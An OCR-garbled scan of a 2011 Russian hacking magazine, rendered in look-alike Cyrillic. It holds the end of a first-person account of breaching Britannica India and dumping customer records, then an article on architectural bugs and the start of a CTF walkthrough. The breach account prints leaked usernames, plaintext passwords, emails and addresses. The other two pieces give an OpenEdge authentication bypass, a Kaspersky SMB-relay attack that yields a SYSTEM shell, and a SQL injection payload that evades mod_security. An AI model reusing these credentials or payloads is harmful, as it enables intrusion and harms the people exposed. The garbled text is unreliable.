огсіег_іс1 

огс1ег_пшпЬег 

огс!ег_сіаСе 

иіЫ 

огсіег_зВаВиз 

Ы11_пате 

Ъі11_ас1с1гезз 

Ъі11_ркопе 

Ьі11_етаі1 

зМр_паше 

зМр_аШгезз 

зМрр_рЬопе 

зкірріпд_скгадез 



и записи с адресами некой доставки: 

Адрес платежа: 55-5 6, Шуод ѴіЬаг, Сигдаіоп Рказе IV, 

Сигдаоп, Сигдаоп, ІпсЗіа 

Телефон: 9810040499 

Е-таі1: каизкікФЪгікаппісаіп . сот 

Адрес доставки: 55-56, Шуод Ѵікаг, Сигдаіоп Рказе IV 

Здесь домен Ьгііаппісаіп.сот (который, кстати, не работает) 
навел меня на мысль, что название базы «Ьі» — это аббревиа- 
тура от Вгііаппіса Іпбіа. Собственно, с этим запросом в Гугле я 
и узнал, что взломал целое индийское отделение Британники, 
располагающееся по адресу Ьгііаппісаіпбіа.сот и по пути /аррз/ 
босз/Ьіпбіа на нашем сервере. 

Сам ресурс Ьгііаппісаіпбіа.сот позволяет жителям Индии 
заказывать различные продукты издательства Епсусіораебіа 
Вгііаппіса (книги и С0/0Ѵ0), так что оставалось только найти 
более подробную инфу о покупателях в базе данных. 

Понятно, что узнав адрес одного из ресурсов, которые лежат на 
похеканном сервере, я сразу же захотел посмотреть на остальные 
сайты с помощью известного РеѵегзеІР-сервиса ѵоидеізідпаі. 
сотДооІз/ѵѵеЬ-зіІез-оп-ѵѵеЬ-зегѵег : 

асіѵосасу . Ьгікаппіса . сот 
ЪепапсІЪе 1 1 а . еЬ . с от 
Ьгікаппісаіпсііа . сот 
согрогаке . Ьгікаппіса . сот 
согрогаке . еЬ . сот 
ІогтзОІ . Ьгікаппіса . сот 
кеір. еЪ. сот 
іпіо . еЬ . сот 
пемзІеШег . еЬ . сот 
петлгзІеШегз . Ьгікаппіса . сот 
рагкпегз . Ьгікаппіса . сот 
заіез . Ьгікаппіса . сот 
зкакізкісз . еЬ. сот 
зкоге . Ъгікаппісаіпсііа . сот 
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Шопимся под чужим аккаунтом 



зиррогк . Ъгікаппіса . сот 

ипіѵегзаі . еЬ . сот 

ъгтя . аррз . еЬ . сот 

штм . Ъгікаппісаіпсііа . сот 



Нвстроиюи 

Атдкувняі сайт : Ы! р://ѵчнн,ЬгіІ лпгка.с опі/Ыпд &/н. и 

Метод атакиі Р05Т 

Тип гъеребора: Атлна 1 акклунта 



ПЭДЧН#Т1РУ 


П|рскси(иет) 




Дополнительно | 



Брёрмр 



Лог атаки 



Ш 



старт 



Стоп 



П*югрмі Й/ЙЁй(І(й^) 
Подобрано; I 

Текущий: тІеѵу;Ьопгіоп 



№*0 



С 



Атака лжршена 



Успешный брутфорс 



Как видишь, список оказался довольно-таки интересным. 

Но оставим его на потом, и вернемся к нашим индийским друзьям :). 

Индийский магазин 

Далее в той же базе данных я открыл таблицу іЫ._гедізІег, содер- 
жащую 9 470 записей. Здесь для меня открылось чарующее зре- 
лище: подробнейшие данные обо всех кастомерах Британники, 
а в качестве бонуса — кристально чистые пароли в плейн-тексте 
(уже в который раз замечаю, что серьезные ресурсы сильно не 
заморачиваются о шифровании важных данных пользователей). 
Вот лишь некоторые из таких данных: 

Нопіе : гозе :кагргіккаиг@коктаі1 . сот: Б-6/13 , Ѵазапк 
Ѵікаг 

гікезк: госкгоѵег : гікезкгоху@уакоо . сот: зип рочлег кіакз 
д Ыоск з.к.-4 тетпадаг 

ріопеег : ргаѵу оді : ргаѵіп_капс!е@гес1і к ктаі 1 . сот : Ъкаи 
сіа^ і гоасі 

дапдиіу : доа@са1сикка : дапди1у_зитат@уакоо . сот: 24 , аіі 
сМгад Іапе, 

тиккапа : ргекку :тиккапа@ѵзп1 . сот: 12 Загак Скаккегдее 
Аѵепие 

апигир :тіка1і : апигир_т@ѵзп1 . сот: Зигазгее 24А, Ьаке 
Ѵіем Коасі 

зирегЬак393 : зсигѵусиг : зирегЪак_393@укаоо . 

со . ик : 12 , Т . 3 . Кгізкпа падаг ехкп ,тодарраіг 

Зиу азкАпапс! :999999999: зиуазкапапсШуакоо . сот : ху 2 

скатракаіі :турс 2 епікк:ЪЪзг@ 1 пзе 1 . сот: сиккаск 

зітОО : 7020557 : зіт00@гесЗікктаі1 . сот: 125 заіпік ѵікаг 

агка : агкаагка : каагаак@уакоо . сот: сакіа 

апіірозк : Ъаккіпсіа : апі1розк@коктаі1 . сот: 2242 , игЬап 

езкаке рказе-іі 

к_с!аздирка :татри : к_с!аздирка@коктаі1 . сот: РО Вох 72 
тасіки : гата : игерІуѲгесІікктаіІ . сот: 657 6 
закуаз ікрапі : зііизііи : закуа^ ік_рапі@тзп . сот: сиккаск 
скапкі сиккаск 

гаткізкоге : Ьапза1123 : гаткізкогеОѵзпІ . сот: 235 , Какга 

Регап, Тііак Ва 2 аг 

ідапа: 1234 : гдапа@ѵзп1 .пек :ка1<ііа 

гакоѵ2 00 0 : гакоѵ2 00 0 : ха1сііпх@дтаі1 . сот: &3/2 , Кгізкпа 
Ыадаг 

расіта : зикапа : расЗтаОеЬіпсііа . сот: В-2 /171 , Зксіаг з апд 
Епсіаѵе 

тапізк : ригокік :тапізк@тапізкригокік . сот:сІ-77 



Рапскзкееі Епсіаѵе 

ккотаз : ккотаз : ккотазОЬгікаппісаіп . сот: 1-86 тасіапдіг 
КазиѴ: рІзСОБ : ѵгазиЗ@етігакез . пек . ае : АУБЦА РО ВОХ 25 
ѵікгат: кгізкпааа : ѵікгат@Ьгікаппісаіп . сот: с-266 , загіка 
ѵікаг 

Тысячи подобных записей я извлек с помощью нехитрого запроса 
«ЗЕЬЕСТ изегпате | |скг(58) I ІраззѵгогсИ |скг(58) I | етаіі | |с 
кг (58) | | аскігезз ЕЕОМ кЫ_гедізкег ЫМІТ 30 ОЕЕЗЕТ 0». 
Для теста я решил залогиниться по адресу Ьгііаппісаіпсііа. 
сот/гедізІгакоп.рЬр с помощью рандомного аккаунта 
ѵіпау_75а;13041974, что, естественно, у меня сразу же получи- 
лось. Имея доступ к любому из аккаунтов магазина индийской 
Британники, можно было заказать очень много бумажных или 
мультимедийных копий данной энциклопедии на любые почтовые 
адреса :). Но я не стал заниматься таким непотребством, а всего 
лишь бережно слил дамп с пользователями к себе на дедик. 

Заключение 

Напоследок я решил еще немного походить по РозІдгеЗОБ базам 
данных. 

Как это не удивительно, но в некой базе Ьі I в таблице изегз также 
оказались незашифрованные пароли: 

даЫе; зргіпдзргипд 
кеа; кеа 

ггміескес ; раззчлгогсі 
заЫз123 ! ; заЬізітадез 
егс123 ! ; егсітадез 
коззикк; коззикк123 ! 
и так далее 

Поразившись такому халатному отношению к своим же собствен- 
ным юзерам, я слил все доступные данные, а также скачал исход- 
ники всех сайтов-поддоменов Британники с РеѵегзеІР-сервиса. 
После неудачной попытки порутать пропатченную машинку я 
удалил все свои шеллы и написал админам на мыло, чтобы они 
внимательнее относились к своим паролям и, соответственно, 
пользователям. 

Тебе же я в очередной раз могу посоветовать не смотреть на 
историю и размах любого онлайн-проекта, а просто немного 
глубже вглядеться его структуру. Быть может, именно ты будешь 
тем человеком, кто найдет знаменательный баг в какой-нибудь... 
Википедии :). ц-ц 
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взлом 



- <л. А 



АРХИТЕК 

Простые дыры в сложных вещах. 



• Сегодня мы в очередной раз рассмотрим ошибки в сложных 
программных вещах, но это будут уже не баги в коде. Мы поговорим 
об ошибках, заложенных еще на стадии проектирования, то есть об 
архитектурных багах. Ну и конечно же, тебя ждут Обау-уязвимости... 



Ошибка в логике 

Ошибка, как известно, может быть в коде ПО, а может в конфигура- 
ции. Кроме того, возможны ошибки при неправильном внедрении 
или сопровождении системы. Но бывают оплошности и в самой 
архитектуре. Такие ошибки прячутся в самой задумке, в самой 
логике системы. Последствия могут быть разными, в том числе и 
такие, которые приводят к нарушению безопасности. Примеров 
таких косяков — пруд пруди: ОИ-Нуасктд, АПР-Р0І50ЫІЫ0, 5МВ 
РЕІ_АѴ... А также менее глобальные — например, ошибки в модулях 
ІіЬс, при обработке переменной окружения Ю_АІЮІТ (автор Тавис 
Орманди]. В общем, зоопарк достаточно богат и многообразен. В 
этой статье я расскажу о своем опыте по выявлению и эксплуата- 
ции таких вот багов. 



Байки из склепа 

В России есть крупные компании. Крупным компаниям надо как-то 
автоматизировать некоторые процессы. Для этого нужно ПО. Такое 
ПО пишут программисты. При этом программисты решают задачу, 
которую ставит им компания. И на стадии проектирования таких 
систем случаются казусы, которые приводят к достаточно приколь- 
ным последствиям. Удивительно, что только уже после написания 
ПО возникает вопрос: а что у нас с безопасностью? Печально, но в 
России это так. 

Пример из жизни — ответ технического директора крупной компа- 
нии, занимающейся разработкой софта, на сообщение об обнару- 
женной уязвимости. Уязвимость банальная, типа «Переполнение 
буфера в стеке», последствия — выполнение произвольного кода. 
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Слайд с конференции СОЫРісІепсе 2010(2): так исправляются кодерские баги 



Со<І1пд -> ІтрІетепЪ -> йиррогЪ 
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Так вот, ответ сотрудника компании, отвечающего за безопасность 
этого софта: «Это бред. Как может выполниться произвольный 
код? Откуда он возьмется в нашем ПО? Если и выполнится код, то 
только наш собственный, а он не произвольный! К тому же, у наших 
клиентов антивирус есть!» Пересказ вольный, но смысл передан 
точно. Так-то вот. 

Но что-то я отвлекся — вернемся к ошибкам в логике. Собственно, 
любой анализ безопасности системы/проекта начинается крайне 
банально — запускается сниффер. Причем на клиентской тачке. 

Это необходимо, чтобы понять, как система работает с сервером. 

В 90% случаев уязвимости в логике выявляются тупо при анализе 
логов этого самого сниффера. К примеру, всем очевидно, что при 
любой модели клиент-сервер желательно разграничивать работу 
СУБД с клиентом. Но многие наши разработчики ленятся писать — 
например, систему управления бизнесом, на основе трехзвенной 
архитектуры. Напоминаю, что при таком раскладе у пользователя 
стоит клиентское ПО, которое работает с сервером приложений, а 
сервер, в свою очередь, работает с данными в СУБД. В итоге надо 
писать два продукта — клиент и сервер приложений, а кроме того 
еще разрабатывать БД (хранимые процедуры, триггеры, да и вооб- 
ще схему). Как итог — многим лениво писать сервер приложений, 
и они разрабатывают клиентское ПО, которое напрямую работает 
с СУБД. Такая двухзвенная модель накладывает ряд дополнитель- 
ных требований к безопасности на уровне логики и разграничения 
доступа. 

Однажды, разбирая логи сниффера, мы увидели такую реализа- 
цию. Клиент выполняет аутентификацию с СУБД на основе І\ІТІ_М, 
то есть доступ в БД был организован по учетным записям домена. 
Далее клиентское ПО выбирало роль, соответствующую своей 
учетной записи, в специальной таблице. А перед тем, как выбирать 
данные из любой боевой таблицы, проверяло, есть ли у данной 
роли права на эти данные. Очевидный косяк тут — проверка роли 
на стороне клиента, ведь что мешает пользователю выполнить 
соединение с СУБД с помощью клиента этой самой СУБД? Так как 
ролевая модель «поддельная», а не основана на возможностях 
СУБД, то такой расклад приводит к полному доступу к системе и 
всем данным. Самое забавное, что выполняя анализ безопасности 
другой отечественной системы, в другой компании, мы обнаружили 
точно такой же подход к архитектуре и, соответственно, ошибка 
была абсолютно такая же. 

Естественно про это «и так знают» и выходят из положения, напри- 
мер, с помощью установки терминальных серверов, с которых 
пользователи и работают с системой. Но хочу заметить, что такой 
подход — не панацея, а просто «костыль». Другие же разработчи- 



ки, зная о подобной проблеме, реализовали ограничение доступа, 
используя ролевую модель самой СУБД. Они отказались от домен- 
ных учеток, заводя учетные записи в базе данных. Внешне это 
выглядит так: пользователь запускает клиентское ПО, ждет секунду, 
получает список пользователей, ищет в списке свою фамилию, 
жмет кнопку <Войти>, после чего у него спрашивают пароль, кото- 
рый он вводит. Сниф трафика показал удивительную вещь: дей- 
ствительно, пароль проверяется на уровне СУБД специально раз- 
работанной процедурой, ролевая модель прописана там же, клиент 
ничего не решает, но шаг с отображением списка пользователей 
был провален полностью. Клиентское ПО коннектится к БД под 
учетной записью по умолчанию, которая прошита в памяти (легко 
можно достать дебаггером). Далее идет селект списка пользовате- 
лей, но тут есть нюанс: по идее это должно было быть реальзовано 
так: 



зеІесС Іодіпз, РІО Ігош сПэ; 

Но, по неизвестным причинам, было сделано так: 

зеіеср * Ігот сіЪ; 



Что позволяло получить пароли всех пользователей при отобра- 
жении их списка. Естественно, пароли в клиентском ПО не ото- 
бражались, но в логах сниффера они были видны вполне четко. И 

Архитектурные баги патчить труднее... 
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даже если бы этого селекта не было, то таблица сІЬ была доступна 
пользователю по умолчанию, так что пароли можно было получить, 
используя прошитую учетку. Зачем программисты используют свои 
навороты, вместо того, чтобы пользоваться уже проверенными 
механизмами? Им виднее... 

ОрепЕсІде 

Ладно, хватит историй, перейдем к делу. Сейчас я расскажу об иди- 
отской архитектурной ошибке в известном в узких кругах продукте 
Р0ВМ8 Ргодгезз ОрепЕсІде. Название кажется тебе незнакомым? 
Вот лишь малый список компаний, которые используют эту СУБД: 

• РерзіСо 

• Соса-Соіа 

• БоЬпзоп & БоБтзоп 

• БоскЬеесІ МагБіп 

• МсБоппеІІ-БоидІаз 

• Зопу 

• Бапоп 

• Мегсесіез-Веп2 

• Рогсі МоБог 

• Магсіа МоБог СогрогаБіоп 

• Неіпекеп 

Так что, как видишь, эта штуковина очень мощная и дорогая, 
используется в крутых компаниях :). Там мы ее и нашли. Вернее, 
нашел ее зЬ2кегг и наш коллега (теперь уже работающий в Уапбех) 
Алексей Трошичев. С помощью одного лишь сниффера на кли- 
ентской части они заметили одну деталь: от клиента к серверу не 



передается ничего, что напоминало бы хэш пароля или сам пароль 
во время аутентификации. Сначала зЬ2кегг заметил, что вроде вот 
он — хэш. Но... он передавался от сервера к клиенту! Это озадачи- 
ло наших героев. Понять, что происходит, было трудно, но штукер 
заподозрил, что тут-то и зарыт ключ к разгадке. Однако времени 
на дебаг не было, так как он находился на объекте и должен был 
делать работу дальше. Зато автор статьи на объекте не был и рас- 
полагал временем. От штукера поступил телефонный звонок с опи- 
санием проблемы: «Неужели хэш от пароля посылается клиенту? И 
если да, то что же клиент делает с этим хэшем?». Я подумал, что он 
бредит. Какой разработчик напишет такую ерунду? Тем не менее, 
раз есть задача, то надо ее решать. Я скачал триал СУБД ОрепЕсІде, 
установил, настроил и начал копать. Первым делом я запустил 
сниффер и провел аутентификацию. Слова Саши подтвердились 
— от клиента ничего дельного не идет, зато от сервера идет какая- 
то ботва, похожая на код, пароль, шифр или хэш. Проверить этот 
факт не составило труда. Сделав дамп таблицы _11зегз, я увидел, 
что напротив логина Абппіп, созданного мной, стоит точно такая же 
строка как и в ТСР-пакете от сервера к клиенту. Опять интуиция 
штукера не подвела — это был хэш. Но какого... почему от сервера? 
Что делает клиент? На эти вопросы помог ответить ОИуОЬд. 

ѴУ/ИаІ Йіе Неск? 

Тут я расскажу подробнее, так как это может быть любопытно. 

Берем ОИуОЬд или ІтппипіІуОеЬиддег и аттачимся к клиентскому 
процессу ОрепЕсІде — ргоѵѵіп32.ехе. Так как хэш приходит от серве- 
ра, то требуется найти место разбора входящего трафика. Для нача- 
ла надо поставить брейкпоинт на функцию гесѵ(), так как, видимо, 
с ее помощью ПО получает данные. Известно, что эта функция 
прячется в библиотеке ѴѴ52_32.сІІІ, но на всякий случай сдела- 
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Функция сравнения хэшей 



ем поиск всех функций. Оля делает это так: правой кнопкой по 
полю с дизасм-кодом, далее «ЗеагсЬ Гэг -> Ыаппе іп аіі гпосШез». 

В открывшемся окне несмотря на отсутствие поля ввода пишем 
«гесѵ» и видим, что еще функция «гесѵ» берется из ѴѴ30СК32.сШ. 
Ставим брейкпоинты на оба вызова. Жмем <Р9> (Рип) и пытаемся 
войти в СУБД. При этом у нас работает брейкпоинт на функции гесѵ. 
О к, смотрим, откуда пришел вызов функции (пришел он из модуля 
рго\л/32.бЩ и ставим там брейкпоинт. Тогда в следующий раз перед 
вызовом гесѵ у нас сработает брейкпоинт в ргоѵѵ32.сІ II, и мы сможем 
отследить входящие данные по <Р8>, так сказать, на глаз, перепры- 
гивая работу гесѵ (Е5Р+4 будет указывать на буфер, куда помеща- 
ются входные данные от сервера). Жмякаем кнопочки <Р8> и <Р9>, 
пока не увидим хэш в данном буфере. Далее нам интересно, что 
будет с этой строкой: выделяем ее и ставим брейкпоинт на чтение 
(см. скриншот). Жмем <Р9> и видим, что срабатывает брейкпоинт 
на память в процессе теттоѵе, то есть хэш меняет место, так что 
снимаем старый брейкпоинт и ставим его в другом месте, выделяя 
область с хэшем после перемещения. Так повторяем еще пару раз 
и в итоге видим, что на третий раз брейкпоинт у нас не на копиро- 
вании, а на сравнении первого байта нашей строки: 

СМР АБ , ВУТЕ РТК БЗ: [ЕСХ] 

В ЕСХ у нас строка хэша из сети, в АІ_ байт, который сравнивается с 
первым байтом хэша. Отмотав пару строчек в дизасме, видим: 

МОѴ АЬ , ВУТЕ РТК БЗ: [ЕБХ] 

То есть в АІ_ первый байт строки по адресу ЕБХ, а там у нас какой- 
то другой хэш (можно предположить, а потом и убедиться в дебаг- 
гере, что этот второй хэш считается локально и берется из поля 
ввода пароля). Далее, если сравнение успешно, то ЕСХ и ЕБХ 
увеличиваются на единицу, и процедура сравнения повторяется. 

Так реализована местная функция из ргоѵѵ32.сІІІ — бЬиІ_5І;соппр(). 
Данный кусок кода сравнивает две строки, в нашем конкретном 
случае — два хэша. И если все совпало, то возвращается 0. Если 
нет — то номер байта, где произошел косяк. Идем по коду далее, 
следя за ЕАХ после выхода из функции сІЬиІ_5Ісотр. И тут мы 
видим, что ЕАХ делают отрицательным, а затем после БЕТЫ про- 
исходит сравнение ЕАХ с нулем и, в зависимости от результата, 
разная обработка. 

ТЕЗТ ЕАХ, ЕАХ 

БЕ ЗНОКТ рг отлЗ 2 .1024653Е 

МОѴ ЕСХ , БТАЮКБ РТК БЗ : [ 1 0 6БІЕЕ4 ] 

МОѴ ЕБХ , БЖ)КБ РТК БЗ : [ЕСХ+ВО] 

РБЗН ЕБХ 

РБЗН 2С6 

САЬЬ рготл32 . 1002 6СА0 ; ошибка аутентификации 

Если ноль — то прыжок, если нет — то по <Б9> видим ошибку 
аутентификации. Поставив на сравнение брейкпоинт и убрав 



остальные, еще раз пытаемся выполнить аутентификацию, 
только после сравнения ЕАХ с нулем меняем ІЁ на ЗЫЕ. Таким 
образом, неважно, чем закончилось сравнение, мы идем сюда: 
ргоѵѵ32.1 024653Е. После нажатия <Е9> ничего не произошло: ника- 
ких сообщений об ошибке, только открылся интерфейс клиента 
СУБД. При этом я мог менять и читать данные в БД с помощью 
этого интерфейса. Сравнение проделанных шагов сданными из 
сниффера показали, что сервер шлет хэш выбранного юзера клиен- 
ту, клиент считывает и сравнивает хэши, после чего шлет результат 
серверу... 

Другими словами, это как если бы был такой диалог: 

Клиент: Привет, сервак, как жизнь? Как дети? 
Форкаешься еще? 

Сервер: Ну привет, клиентик . Ты сам-то чьих будешь? 
Клиент: Ну как же это? Админ я, Админ! 

Сервер: Ох. . . ну если ты Админ, то хэш твоего пароля 
XXX! Ты уверен, что у твоего пароля такой хэш? 

Клиент : Ну ты скажешь ! Конечно ! У меня такой же хэш 
и получился! Админ я или кто, по-твоему! 

Сервер: Ну раз Админ, то проходи! 

Вот и все. Самая бредовая бага, которую я когда-либо видел. 
Патчим клиентскую БІ_І_'ку и пароль нам больше не нужен :). Как 
разработчик до такого додумался — пес его знает. Кстати, если 
пользователя не существует, то получится такой расклад: 

Клиент: Привет, сервак, как жизнь? Как дети? 
Форкаешься еще? 

Сервер: Ну привет, клиентик. Ты сам-то чьих будешь? 
Клиент: Ну как же это? 0ткТе4нзНЗрх я, 0ткТе4нзНЗрх ! 
Сервер: Эээ . . . Чувак, слышь, не знаю я никакого 
0ткТе4нзНЗрха . . . 

Клиент: Ну ты скажешь! У меня вон и хэш совпал! 
0ткТе4нзНЗрх я... 

Сервер: Ну раз 0ткТе4нзНЗрх , то проходи. . . ! 

Мы связались с разработчиком и очень долго ждали, что он решит. 
Решил он просто: да, это баг, но только для тех, кто использует 
СУБД-аутентификацию. Все крутые чуваки ее не должны использо- 
вать. А еще лучше используйте п-звенную архитектуру. Такой ответ 
понятен: баг невозможно исправить хотя бы по причине обратной 
совместимости. Но факт есть факт. 

Казрегеку АѴ ІОООсІау 

Говоря об архитектурных багах, надо понимать, что иногда 
они зависят от множества факторов. Так эта глава расскажет 
об ошибке во всеми любимом антивирусе имени Касперского. 
Ошибка приводит к удаленному исполнению произвольного 
кода, причем никаких эксплойтов писать не надо, да и вообще 
ничего делать не надо — все уже написано и сделано. Значит, 
делал я с Алексеем Тюриным ака ОгеепБод (ну и ники у людей...) 



ХАКЕР 03 /146/ 201 1 



► Обз 








взлом 




внутренний пентест одной компании, и все бы ничего, но никак 
их не сломать: пароли сменены, ОС пропатчены — что же 
делать? У меня случайно был включен сниффер в Саіп. Пока 
Леха ломал Огасіе ТИБ (что, кстати, тоже закончилось успехом), 
я открыл Кайн — в закладке «Раззѵѵогсіз -> БМВ» кроме моего 
прочего трэша была одна строчка, в которой говорилось, что 
некий сервер X пытался выполнить ЫТІ_М-аутентификацию с 
моей рабочкой, используя доменную учетку какого-то пользо- 
вателя. В имени учетки явно прослеживалось слово «Казрег». 
Сниффер работал четыре часа, и лишь один раз проскочила 
такая штука (мне еще повезло, что протокол был БМВ, а не 
БМВ2, так как Саіп пока не умеет парсить новый протокол). Так 
что же это за ерунда? С творением Евгения Касперского я не 
очень знаком, однако Ооодіе помог разобраться. Итак, очевидно, 
что есть некий центральный сервер Каспера — это знают все. На 
остальных тачках стоит «клиентская часть», которая управляется 
центральной. Раз что-то пыталось пролезть ко мне с сервака, 
где стоит Сервер Касперского, то очевидно, что там есть некий 
функционал опроса сети. Погуглив чутка, было выявлено, что 
такой функционал и правда есть. В Казрегзку Асітіпізігаііоп 
КМ; 6/8 есть фича «Опрос ІР-подсети». Написано, что эта фигня 
ищет новые компы в сети с помощью ІСМР-пинга. После этого 
Каспер пытается зайти на него по БМВ, чтобы найти там своего 
агента и, не найдя его, комп добавляется в список нераспреде- 
ленных хостов. Так как разрабатывать свой протокол очень лень, 
то логично использовать ЫТЕМ-аутентификацию. Поняв все это, 
я предположил, что раз речь идет о Каспере, то учетка должна 
обладать неслабыми правами. На следующее утро я включил 
зт Ь_геІау- модуль из состава Меіагріоіі, натравил его на сервер 
У из сети компании и стал ждать. Через четыре часа у меня был 
шелл на сервере У с учетной записью ИТ АІЛН0РІТУ/5У5ТЕМ. 
Итак, что же произошло? 



Исходные данные: 

1. Сеть на основе Місгозоі 1 !: Асііѵе Оігесіогу. 

2 . Сервер Касперского с Асітіпізігаііоп КіС 

3. В Асітіпізігабоп КМ; установлена опция «Сканирование ІР-сети». 

Убери галку — спаси сеть! 




► 064 
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Схема атаки на ресурсы в ѴѴіпсІоѵѵ$-сети с серваком 
Каспера 

По умолчанию сканирование происходит раз в семь часов. Так 
как серваку надо управлять всеми тачками с антивирусами, то 
там везде должна быть учетка, причем с правами локального 
админа. Каспер пытается залезть этой учеткой куда попало, даже 
на неизвестные компы в сети, например на наш хост с ВаскТгаск, 
где запущен 5тЬ_ге1ау. В этот момент мы перехватываем 
І\ІТІ_М-запрос и перенаправляем на любой сервер или рабочку 
с Касперским (кроме сервера X, откуда Каспер сканит). Другими 
словами, мы пытаемся выполнить аутентификацию на серваке У 
от имени Каспера. У ответит нам ЫТЬМ-РезропБе пакетом, кото- 
рый мы передадим серваку Каспера — X. ОС на X подумает, что 
все ОК и продолжит аутентификацию согласно ответу. Модуль 
5тЬ_геІау также будет пересылать пакеты У от имени Каспера, 
что в итоге закончится тем, что сервак У проаутентифицирует нас 
под сервисной доменной учеткой, которая имеет права локально- 
го админа. Данных прав достаточно, чтобы проинсталлить и запу- 
стить, например, теіегргеіег. Таким образом выполнено проник- 
новение и сервер У скомпрометирован (вспоминая предыдущую 
статью, можно прикинуть, что одного такого проникновения впол- 
не бывает достаточно, чтобы захватить весь домен]. Эксплойт 
работает для любой версии ѴѴіпсІоѵѵз, так что это достаточно 
простой и универсальный метод пробивания серваков (учитывая 
популярность в корпоративных сетях Каспера). Архитектор просто 
забыл про особенность протокола ЫТІ_М и его недостатки. Дал 
слишком большие права пользователю и везде пытается проау- 
тентифицироваться под его именем. Простая архитектура опро- 
са ІР-подсети + недостаточно надежный метод аутентификации 
(І\ІТІ_М) сделали свое дело. 

И что? 

В данной статье я хотел обратить внимание на то, как важно 
уделять внимание мелочам и деталям на этапе построения идеи 
проекта и его архитектуры. Ошибки в логике очень просто экс- 
плуатировать и сложно исправлять. Кроме того, если ты обратил 
внимание, то все перечисленные тут ошибки были обнаружены 
ручным анализом с помощью простейшего сетевого сниффера. 
Если поиск ошибок в коде хоть как-то можно автоматизировать, 
то поиск логических ошибок — нельзя, это ручная работа. При 
этом, как было сказано, найти их несложно — внимательность + 
знание о том, как это работает, всегда поможет понять угрозу. 

Будь внимателен и тау 1Ье Іюгсе Ье ѵѵііб уои... ш 
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■ ■ Дмитрий Евтеев, Розіііѵе ТесЬпоІодіез ІсІеѵІееѵ.ЫодзроІ.сот),. 
Сергей Рублев, Розіііѵе ТесЬпоІодіез (рІгезеагсЬ.ЫодзроІ.сот) 
Тарас « о х сі е б » Иващенко, Яндекс (Ыод.охгіеі.іпіо) 




Руководство по прохождению Наск0ие$1 2010 



• В данной публикации описано прохождение большинства 
предложенных этапов хак-квеста, который проходил в конце августа на 
фестивале СНаоз Сопзігисііопз 2010, а затем в урезанном формате был 
доступен опііпе на портале $есигі1уІ_аЬ. 



НаскОиезі 2010 — это открытые соревнования по защите инфор- 
мации, сутью которых является выполнение ряда разнообразных 
заданий, связанных с информационной безопасностью: ѵѵеЬ- 
Ьаскіпд, зосіаі епдіпеегіпд, геѵегзе епдіпеегіпд и тому подобное. 
Участникам хак-квеста предоставлялась полная свобода выбора по 
прохождению заданий — их можно было выполнять в любой после- 
довательности. Для захвата одного ключа (флага) необходимо было 
воспользоваться чередой реальных уязвимостей в самых настоя- 
щих (продуктивных) системах, так что участники конкурса могли 
почувствовать себя реальными взломщиками :). Правда, результаты 
соревнований продемонстрировали, что для большинства участ- 
ников задания НаскОиезІ 2010 оказались довольно сложными. Эта 
статья представляет собой руководство по прохождению некоторых 
из них. 

Задание №1: Классика 

После предварительного сканирования сети обнаруживался веб- 
сайт некого турагентства под названием «Хаос». Немного побродив 
по этому сайту, в разделе поиска можно было по выдаваемому 
базой данных Му5СН_ сообщению об ошибке отыскать уязвимость 
типа «Внедрение операторов 50 1_» (іпзегі-базесі). 

Стоит отметить, что сайт был защищен тосі_5есигіІу с правилами 
по умолчанию. Уязвимый 501-запрос имеет вид: 



$риегу = " ІМ8ЕКТ ШТО іпсіехез (ЕехЕ , зошгсе) ѵаіие 
( ' " . $_СЕТ [ • СехС ' ] . " 1 , " . $_СЕТ [ ' асЕіоп 

Таким образом, запрос для проведения атаки может выглядеть 
так: 

ЦЦЦр://172.16.0. 2 /зеагсЪ. . рЦр?асРіоп=0&ЦехЦ=1 ' /* ! %2Ь ( з 
еІесЕ+1+^гош ( зеІесС+соипР ( * ) , сопсаС ( ( зеіеср+изег ( ) +^г 
ош+іп^огтаРіоп_зс]іета . СаЫез + ІішіР + О , 1 ) , 0x3а , Ооог (га 
псі ( 0 ) *2 ) ) х+^гот+іп^огтаЦіоп_зс]тета . РаЫез+дгоир+Ьу+х) 
а) * / , 0 ) --+ 

Приведенный выше запрос отобразит идентификатор пользо- 
вателя, от имени которого веб-приложение взаимодействует с 
базой данных. Как это работает? 

1. Используется конструкция /*!...5дІ-код...*/, которая позво- 
ляет выполнять 501-код в обход правилам по умолчанию всех 
версий тоб_зесигі1;у, включая последние версии (см. беѵіееѵ. 
ЫодвроТ со т/2009/1 0/вдІ-іщесІіоп-ѵѵаТЬіппІ ). 

2. Используется символ «+» (%2Ь) для работы со строками (под- 
робнее см. Ьир5://гбоТогдЛогит/5ЬоѵѵІбгеаб.рЬр?1:=60 ). 

3. Используется универсальный способ проброса полезной 
нагрузки в сообщении об ошибке (см. дѵѵа2аг.ги/?р=7 ): 
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Сообщение об ошибке, свидетельствующее об уязвимо- 
сти 501. Іп|есНоп 




Эксплуатация 501. Іп|ес(іоп на сайте турагентства «Хаос» 
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Классическая эксплуатация уязвимости Ветоіе Рііе 
Іпсіисііпд 



Ѵлімнжпѵиі 



Уязвимость ЬосаІ Рііе Іпсіисііпд 




Уязвимости из серии «оІб-зсИооІ» 



в Краткое описание 

іТЧРИИ к 



+1ітіР+0 , 1 ) , 0x3а , Ріоог ( гапсі ( 0 ) *2 ) ) х+Ргот+іпРогтаРіоп_ 
зсБета . РаЫез+дгоир+Ъу+х) а) * / , 0 ) -- + 



ѵ Описание 

Сшісн 

Ср-лсррцгиес 

С^іііі мт-чг» 

СИ* ^ 1 1 1 

нГ*+*ОрНЛ4.-Я 

Гцдни : Офадчт* нти#пр«п* гдегдеч-м зФч щщді і ш і »№» іѵгггп к,?грЙ ;шн. 

^цнти р-#4*ты 

М И І 3 I 

Уязвимость РаіЬ ТгаѵегзаІ 

зеіеср 1 Ргот( зеіеср соипР ( * ) , сопсаР ( ( зеіеср 
изег ( ) ) , 0x3а , ііоог (гапсі ( 0 ) *2 ) ) х ігот іп:ЕогтаРіоп_ 
зсБета . РаЫез дгоир Ьу х)а 

4. БОБ-запрос приводится к синтаксически корректному виду 
путем добавления конструкции « р 0)» р а все лишнее обрезается с 
использованием двух символов тире. Чтобы обрезать конец добав- 
ляемого запроса на веб-сервере, используется пробельный символ 
«+» (в НТТР ОЕТ-запросе является эквивалентом пробелу). 
Развивая вектор атаки, требовалось стянуть полезные данные из 
базы данных. Для МуБСіБ 5.x это довольно просто, так как в этой 
версии присутствует база іп1 : огтаІіоп_5сЬеппа, которая содержит 
всю необходимую информацию о структуре СУБД. Таким образом, 
атака с использованием уязвимости БОБ Іщесбоп сводилась к 
типовому набору запросов: 

